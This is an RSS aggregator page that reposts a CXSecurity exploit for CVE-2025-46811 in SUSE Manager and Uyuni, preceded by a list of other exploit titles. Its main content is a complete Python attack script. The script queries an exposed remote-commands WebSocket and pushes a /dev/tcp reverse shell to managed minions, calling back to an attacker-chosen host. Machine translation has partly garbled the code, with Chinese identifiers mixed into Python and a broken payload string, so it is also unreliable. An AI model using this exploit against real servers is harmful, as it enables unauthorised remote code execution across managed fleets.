惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Engineering at Meta
Engineering at Meta
月光博客
月光博客
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
博客园 - 【当耐特】
有赞技术团队
有赞技术团队
人人都是产品经理
人人都是产品经理
腾讯CDC
Jina AI
Jina AI
I
InfoQ
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
宝玉的分享
宝玉的分享
The GitHub Blog
The GitHub Blog
V
Visual Studio Blog
S
SegmentFault 最新的问题
Blog — PlanetScale
Blog — PlanetScale
Stack Overflow Blog
Stack Overflow Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
美团技术团队
MyScale Blog
MyScale Blog
量子位

CXSECURITY Database RSS Feed - CXSecurity.com

Linux nf_tables 6.19.3 Local Privilege Escalation ThingsBoard IoT Platform 4.2.0 Server-Side Request Forgery (SSRF) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300) Apache HertzBeat 1.8.0 Remote Code Execution JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution NiceGUI 3.6.1 Path Traversal - CXSecurity.com GUnet OpenEclass E-learning platform < 4.2 Remote Code Execution (RCE) Windows Snipping Tool NTLMv2 Hash Hijack telnetd 2.7 Buffer Overflow - CXSecurity.com Kukurigu LPE - Linux Kernel Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Event Booking Calendar-5.0 Cross-site scripting (reflected) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Ninja Forms Uploads Unauthenticated PHP File Upload Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking (CSWSH) Erugo 0.2.14 Remote Code Execution (RCE) Linux Kernel Local Privilege Escalation via Memory Handling and Access Control Weakness Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Linux Kernel proc_readdir_de() 6.18-rc5 Local Privilege Escalation Insecure Permissions vulnerability in Nagios Network Analyzer v.2024R1.02-64 and before allows a local attacker to escalate privileges via the remove_source.sh component. Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation solaredge-CSRF-OOB-Injection - CXSecurity.com Trojan-Spy.Win32.Small / Remote Command Execution OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation Critical Remote Code Execution Vulnerability in Windows Internet Key Exchange (IKE) Service (CVE-2026-33824) WordPress Madara Local File Inclusion FortiWeb 8.0.2 Remote Code Execution Easy File Sharing Web Server v7.2 Buffer Overflow NetBT e-Fatura Privilege Escalation Docker Desktop 4.44.3 Unauthenticated API Exposure MaNGOSWebV4 4.0.6 Reflected XSS Grafana 11.6.0 SSRF OctoPrint 1.11.2 File Upload esm-dev 136 Path Traversal Linux Kernel mseal Invariant Violation (Linux kernel 6.17-7.0 rc5) astrojs/vercel < = 10.0.0 - Unauthenticated x-astro-path Header Path Override Microsoft SQL Server Privilege Elevation Through FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Wavlink WL-WN579X3-C firewall.cgi UPNP Stack-based Buffer Overflow esiclivre 0.2.2 SQL Injection Payara Server Cross Site Scripting esiclivre 0.2.2 SQL Injection SiYuan < = v3.6.1 Note unauthenticated arbitrary file read (path traversal) Tenda AC21 V1.0 V16.03.08.16 - Stack Buffer Overflow in SetNetControlList WWBN AVideo < = 26.0 - Authenticated SQL Injection Windows RRAS Remote Code Execution Vulnerability (CVE-2026-26111) - SE-RCE Exploit Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation Exploit Discourse < = 2026.2.1 Authenticated Missing Authorization Kanboard < = 1.2.50 Authenticated SQL Injection Glances < = 4.5.2 OS Command Injection via Mustache Template Fields
SUSE Manager 4.3.15 代码执行
Wiktor Maj · 2026-05-23 · via CXSECURITY Database RSS Feed - CXSecurity.com

# 利用标题:SUSE Manager 4.3.15 - 代码执行 # 日期:29.01.2026 # 利用作者:Wiktor Maj # 厂商主页:https://www.uyuni-project.org/ # 软件链接:https://github.com/uyuni-project/uyuni # 版本:Uyuni 2025.05, SUSE Manager 5.0.4, SUSE Manager 4.3.15 # 测试环境:Debian 12 (bookworm), Python 3.11.2 与 websocket-client 1.9.0 # CVE:CVE-2025-46811 # 向 SUSE Manager 或 Uyuni 的易受攻击的 WebSocket 发送反向 shell 有效载荷。 # 在单独的终端中设置监听会话。 # 发送有效载荷后,切换到您的监听终端检查是否弹出一个 shell。 # 示例: # python3 cve-2025-46811.py --ip 192.168.10.126 --port 443 --host-ip 192.168.10.113 --host-port 9001 --ssl #### 程序约束 #### PAYLOAD = f"sh -i">& /dev/tcp/HOST_IP/HOST_PORT 0>&1" # 反向shell载荷,HOST_IP和HOST_PORT将被替换为命令行参数 CONNECTION_RETRIES = 4 # 连接尝试次数 CONNECTION_DELAY_BETWEEN_RETRIES = 15 # 秒 WEBSOCKET_TIMEOUT = 10 # 秒 ############################## import argparse import json import socket import ssl import sys import time import websocket def parse_args() -> argparse.Namespace: parser = argparse.ArgumentParser(description="CVE-2025-46811 SUSE Manager 利用实现") Uyuni。", add_help=False) parser.add_argument("-h", "--help", action="help", default=argparse.SUPPRESS, help="显示此帮助文本并退出。") parser.add_argument("--ip", required=True, help="受害者 IPv4 或主机名。") parser.add_argument("--port", type=int, default=443, help="受害者端口(默认:443)。") parser.add_argument("--host-ip", required=True, help="攻击者主机 IPv4 或主机名。") parser.add_argument("--host-port", type=int, required=True, help="攻击者主机端口。") group = parser.add_mutually_exclusive_group() group.add_argument("--ssl", dest="ssl", action="store_true", help="为 WebSocket 连接使用 SSL/TLS(默认)。") group.add_argument("--no-ssl", dest="ssl", action="store_false", help="禁用 SSL/TLS 并使用明文 WebSocket。") parser.set_defaults(ssl=True) return parser.parse_args() def resolve_target(hostname: str) -> str: return socket.gethostbyname(hostname) def receive_preview_minions_message(websocket_connection: websocket.WebSocket) -> str: while True: try: message = websocket_connection.recv() if message: print("Received:", message) if isinstance(message, bytes): message = message.decode("utf-8", errors="replace") return message except websocket.WebSocketTimeoutException as exception: raise RuntimeError("Failed to receive preview minions message") from exception def decode_preview_minions_message(message: str) -> list[str]: try: preview_output = json.loads(message) except json.JSONDecodeError as exception: raise RuntimeError("预览响应不是有效的JSON") from exception if ( isinstance(preview_output, dict) and isinstance(preview_output.get("minions"), list) and preview_output["minions"] and all(isinstance(entity, str) for entity in preview_output["minions"]) ): return preview_output["minions"] raise RuntimeError("预览响应期望非空的'minions'列表") def receive_preview_minions(websocket_connection: websocket.WebSocket)> list[str]: message = receive_preview_minions_message(websocket_connection) minions = decode_preview_minions_message(message) return minions def select_minion(minions: list[str]) -> str: print("可用的仆人:") for仆人ID,仆人名 in enumerate(仆人, start=1): print(f"{仆人ID}) {仆人名}") 提示 = "选择仆人编号(默认是'1',或'c'取消): " while True: 选择 = input(提示).strip() if 选择 == "": return 仆人[0] if 选择.lower() == "c": ("未 print选择仆人。退出。") sys.exit(0) if 选择.isdigit(): 索引 = int(选择) if 1<= index <= len(minions): return minions[index - 1] print("无效选择。") def connect_to_websocket(target_ip: str, port: int, use_ssl: bool, sslopt: dict, ) -> websocket.WebSocket: scheme = "wss" if use_ssl else "ws" try: return websocket.create_connection( f"{scheme}://{target_ip}:{port}/rhn/websocket/minion/remote-commands", timeout=WEBSOCKET_TIMEOUT, sslopt=sslopt, ) except ssl.SSLError as exception: if "WRONG_VERSION_NUMBER" in str(exception): raise RuntimeError("Websocket 似乎未加密,尝试使用 --no-ssl") from exception raise except websocket.WebSocketBadStatusException as exception: if exception.status_code == 400: raise RuntimeError("Websocket 似乎已加密,尝试使用 --ssl") from exception raise except TimeoutError as exception: raise RuntimeError("Websocket 可能受到防火墙限制") from exception def get_minions(target_ip: str, port: int, use_ssl: bool, )> tuple[websocket.WebSocket, list[str]]: sslopt = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False} for attempt in range(1, CONNECTION_RETRIES + 1): websocket_connection = None try: websocket_connection = connect_to_websocket(target_ip, port, use_ssl, sslopt) websocket_connection.send(json.dumps({"preview": True, "target": "*"})) minions = receive_preview_minions(websocket_connection) return websocket_connection, minions except ( websocket.WebSocketTimeoutException, websocket.WebSocketConnectionClosedException, ): if websocket_connection is not None: websocket_connection.close() if attempt == CONNECTION_RETRIES: break time.sleep(CONNECTION_DELAY_BETWEEN_RETRIES) raise RuntimeError("目标websocket不脆弱或无法访问") def send_payload(websocket_connection: websocket.WebSocket, target: str) -> None: payload = PAYLOAD.replace("HOST_IP", args.host_ip).replace("HOST_PORT", str(args.host_port)) websocket_connection.send(json.dumps({"preview": False, "target": target, "command": payload})) if __name__ == "__main__": args = parse_args() websocket_connection = None try: websocket_connection, minions = get_minions( target_ip=resolve_target(args.ip), port=args.port, use_ssl=args.ssl, ) selected_minion = select_minion(minions) send_payload(websocket_connection, selected_minion) print("Payload sent, closing.") finally: if websocket_connection is not None: websocket_connection.close()

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。